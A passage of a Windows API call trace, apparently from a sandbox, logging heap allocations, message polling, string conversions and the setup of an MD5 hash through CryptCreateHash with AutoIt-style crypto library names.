(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0229.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0229.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0229.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0229.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0229.644] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.644] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0229.644] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0229.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0229.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0229.645] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0229.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0229.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0229.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0229.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.648] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0229.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.648] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.648] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0229.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0229.649] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.649] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.649] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0229.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0229.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.649] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.650] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0229.650] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0229.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51340, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0229.656] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0229.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0229.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0229.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.661] 